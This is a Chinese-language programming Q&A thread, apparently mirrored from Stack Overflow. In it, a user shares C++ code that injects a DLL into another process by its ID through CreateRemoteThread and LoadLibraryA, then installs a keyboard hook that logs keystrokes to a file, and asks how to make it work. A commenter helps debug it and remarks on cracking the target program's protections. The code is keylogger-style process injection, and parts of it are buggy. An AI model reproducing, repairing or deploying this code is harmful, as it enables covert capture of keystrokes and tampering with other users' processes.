0
我想从另一个进程使用注入的DLL获取键盘消息,但我不知道在哪里必须在我自己的程序中调用函数。 这里是我注入DLL函数:如何调用注入的DLL里面的函数
//this is my dll main function
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
{
/* open file */
FILE *file;
fopen_s(&file, "d:\\dll\\temp.txt", "a+");
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
hInst = (HINSTANCE)hModule;
// should be function calling be here????
installhook();
break;
case DLL_PROCESS_DETACH:
fprintf(file, "DLL detach function called.\n");
break;
case DLL_THREAD_ATTACH:
fprintf(file, "DLL thread attach function called.\n");
break;
case DLL_THREAD_DETACH:
fprintf(file, "DLL thread detach function called.\n");
break;
}
hInst = (HINSTANCE)hModule;
/* close file */
fclose(file);
return TRUE;
}
这里是我安装钩子函数安装keyboardproc处理
BOOL __declspec(dllexport)__stdcall installhook()
{
HWND targetWnd;
HANDLE hProcess;
unsigned long processID = 0;
hkb = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)KeyboardProc, hInst, GetCurrentThreadId());
return TRUE;
}
,这是我keyboardproc函数体
LRESULT __declspec(dllexport)__stdcall CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
char ch;
MessageBoxA(nullptr, "key touched\n", "DLL_PROCESS_ATTACH", MB_OK | MB_ICONWARNING);
do
{
if (((DWORD)lParam & 0x40000000) && (HC_ACTION == nCode))
{
if ((wParam == VK_SPACE) || (wParam == VK_RETURN) || (wParam >= 0x2f) && (wParam <= 0x100))
{
FILE *file;
fopen_s(&file, "d:\\dll\\temp.txt", "a+");
fprintf(file, nCode + ".\n");
}
}
} while (0);
return CallNextHookEx(hkb, nCode, wParam, lParam);
}
,并终于在这里是我的主要程序,我将dll注入目标进程
int procID = 9448;
HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procID);
if (process == NULL) {
printf("Error: the specified process couldn't be found.\n");
}
/*
* Get address of the LoadLibrary function.
*/
LPVOID addr = (LPVOID)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
if (addr == NULL) {
printf("Error: the LoadLibraryA function was not found inside kernel32.dll library.\n");
}
/*
* Allocate new memory region inside the process's address space.
*/
LPVOID arg = (LPVOID)VirtualAllocEx(process, NULL, strlen(buffer), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if (arg == NULL) {
printf("Error: the memory could not be allocated inside the chosen process.\n");
}
/*
* Write the argument to LoadLibraryA to the process's newly allocated memory region.
*/
int n = WriteProcessMemory(process, arg, buffer, strlen(buffer), NULL);
if (n == 0) {
printf("Error: there was no bytes written to the process's address space.\n");
}
cout << procID << "\nhandle:" << process << "\nAddress:" << addr << "\nVirtualArg:" << arg << "\nWM:"<<n<<"\n";
/*
* Inject our DLL into the process's address space.
*/
HANDLE threadID = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)addr, arg, NULL, NULL);
if (threadID == NULL) {
printf("Error: the remote thread could not be created.\n");
}
else {
printf("Success: the remote thread was successfully created.\n");
}
/*
* Close the handle to the process, becuase we've already injected the DLL.
*/
CloseHandle(process);
我的代码中出现了什么问题,以及必须更改才能获得所需结果!
感谢KRAB,这是确定的,但在需要从我的程序调用installhook?如何能够调用install hook!? –
不,你不需要从注入dll的程序中调用isntallhook。你需要从DLL中调用DLL_PROCESS_ATTACH。如果它不起作用,可能是因为你试图破解的程序对此有一些保护:) – Krab
@MousaKhodaei:你应该从SetWindowsHookEx检查返回值 – Krab